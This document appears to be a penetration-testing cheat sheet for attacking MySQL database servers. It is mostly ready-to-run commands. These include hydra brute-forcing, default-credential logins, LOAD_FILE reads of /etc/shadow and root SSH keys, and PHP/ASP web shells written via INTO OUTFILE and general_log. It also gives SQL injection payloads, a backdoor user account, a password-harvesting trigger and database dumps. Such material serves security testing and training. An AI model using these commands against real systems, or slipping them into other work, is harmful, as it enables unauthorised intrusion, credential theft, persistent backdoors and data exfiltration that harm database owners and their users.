MySQL Database Server
Environment Variables / Setup
export IP=
export PORT=3306
export USER=root
export PASS=password
Phase 1: MySQL Service Discovery
Nmap MySQL Scripts
nmap --script=mysql-* -p $PORT $IP
Service Detection
# Check MySQL service
nmap -sV -p $PORT $IP
# Banner grabbing
telnet $IP $PORT
nc -nv $IP $PORT
Phase 2: Authentication Testing
Anonymous Access Testing
mysql -h $IP -u root
mysql -h $IP -u admin
mysql -h $IP -u ''
Default Credentials Testing
# Common MySQL default credentials
mysql -h $IP -u root -p''
mysql -h $IP -u root -proot
mysql -h $IP -u root -padmin
mysql -h $IP -u root -ppassword
mysql -h $IP -u admin -padmin
mysql -h $IP -u admin -ppassword
mysql -h $IP -u user -puser
Password Brute Force
# Using hydra
hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt $IP mysql
# Using nmap
nmap --script mysql-brute --script-args userdb=/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt -p $PORT $IP
Phase 3: MySQL Enumeration
Basic Information Gathering
# Connect to MySQL
mysql -h $IP -u $USER -p$PASS
# Basic enumeration
SELECT version();
SELECT user();
SELECT database();
SHOW databases;
SHOW tables;
SELECT host, user, password FROM mysql.user;
Database and Table Enumeration
# List all databases
SHOW databases;
# Use specific database
USE database_name;
# List tables in current database
SHOW tables;
# Describe table structure
DESCRIBE table_name;
# Show table contents
SELECT * FROM table_name;
User and Privilege Enumeration
# Show current user privileges
SHOW GRANTS;
SHOW GRANTS FOR CURRENT_USER();
# List all users
SELECT user, host, password FROM mysql.user;
# Check for file privileges
SELECT user, file_priv FROM mysql.user WHERE file_priv='Y';
# Check for admin privileges
SELECT user, super_priv FROM mysql.user WHERE super_priv='Y';
Phase 4: MySQL Exploitation
File Operations (If FILE Privilege)
# Read files from filesystem
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/etc/shadow');
SELECT LOAD_FILE('/var/www/html/config.php');
# Write files to filesystem (if secure_file_priv allows)
SELECT 'shell content' INTO OUTFILE '/var/www/html/shell.php';
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
Web Shell Creation
# Create PHP web shell
SELECT '<?php echo system($_REQUEST["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
# Create ASP web shell
SELECT '<% eval request("cmd") %>' INTO OUTFILE '/var/www/html/shell.asp';
# Test web shell
curl http://$IP/shell.php?cmd=whoami
UDF (User Defined Function) Exploitation
# Check for UDF capability
SELECT * FROM mysql.func;
# Create UDF for command execution (requires root privileges)
# This involves uploading a malicious shared library (.so file)
# Use Metasploit mysql_udf_payload or manual UDF creation
SQL Injection (If Web App Uses MySQL)
# Test for SQL injection in web applications
' OR 1=1--
" OR 1=1--
' UNION SELECT 1,2,3--
' UNION SELECT user(),database(),version()--
# Extract data
' UNION SELECT username,password FROM users--
' UNION SELECT LOAD_FILE('/etc/passwd'),2,3--
Phase 5: Database Content Analysis
Sensitive Data Hunting
# Look for password tables
SHOW tables LIKE '%pass%';
SHOW tables LIKE '%user%';
SHOW tables LIKE '%admin%';
# Search for sensitive columns
SELECT table_name, column_name FROM information_schema.columns WHERE column_name LIKE '%pass%';
SELECT table_name, column_name FROM information_schema.columns WHERE column_name LIKE '%email%';
# Extract user credentials
SELECT username, password FROM users;
SELECT email, password FROM accounts;
Configuration Analysis
# Check MySQL configuration
SHOW variables;
SHOW variables LIKE 'secure_file_priv';
SHOW variables LIKE 'version%';
# Check for dangerous settings
SHOW variables LIKE 'log_bin_trust_function_creators';
SHOW variables LIKE 'general_log%';
Phase 6: Privilege Escalation via MySQL
Running as Root User
# Check if MySQL runs as root
SELECT user();
\! whoami
# If running as root, file operations have elevated privileges
SELECT LOAD_FILE('/root/.ssh/id_rsa');
Log File Manipulation
# Enable general log
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
# Execute query to write to log
SELECT '<?php system($_GET["cmd"]); ?>';
# Disable logging
SET GLOBAL general_log = 'OFF';
Phase 7: Post-Exploitation
Persistence via MySQL
# Create backdoor user
CREATE USER 'backdoor'@'%' IDENTIFIED BY 'password123';
GRANT ALL PRIVILEGES ON *.* TO 'backdoor'@'%';
FLUSH PRIVILEGES;
# Create trigger for persistence
CREATE TRIGGER backdoor_trigger BEFORE INSERT ON users FOR EACH ROW INSERT INTO backdoor_table VALUES (NEW.username, NEW.password);
Data Exfiltration
# Export database contents
mysqldump -h $IP -u $USER -p$PASS database_name > dump.sql
# Export specific tables
mysqldump -h $IP -u $USER -p$PASS database_name table_name > table_dump.sql
# Export to CSV
SELECT * FROM users INTO OUTFILE '/tmp/users.csv' FIELDS TERMINATED BY ',' ENCLOSED BY '"' LINES TERMINATED BY '\n';
MySQL Security Misconfigurations
Common Issues to Check
- Default credentials (root with no password)
- FILE privilege granted to non-admin users
- secure_file_priv set to empty (allows file operations anywhere)
- Running as root user
- General log enabled and writable location
- Weak user passwords
- Overly permissive grants (ALL PRIVILEGES to non-admin users)
MySQL Enumeration Checklist
- Anonymous access testing
- Default credentials testing
- User enumeration and privilege checking
- Database and table discovery
- File read/write capability testing
- Web shell creation (if web server present)
- UDF exploitation potential
- Sensitive data extraction
- Configuration analysis
Tools Summary
# Enumeration
nmap mysql scripts, mysql client
# Exploitation
mysql client, mysqldump, custom UDF libraries
# Brute force
hydra, nmap brute scripts
Common MySQL Ports
3306/tcp - MySQL default
3307/tcp - MySQL alternate
Next Steps
Once MySQL access is gained:
- Extract sensitive data from databases
- Attempt file operations for web shell creation
- Check for password reuse across other services
- Analyze application code if database credentials found
- Escalate privileges if MySQL runs as root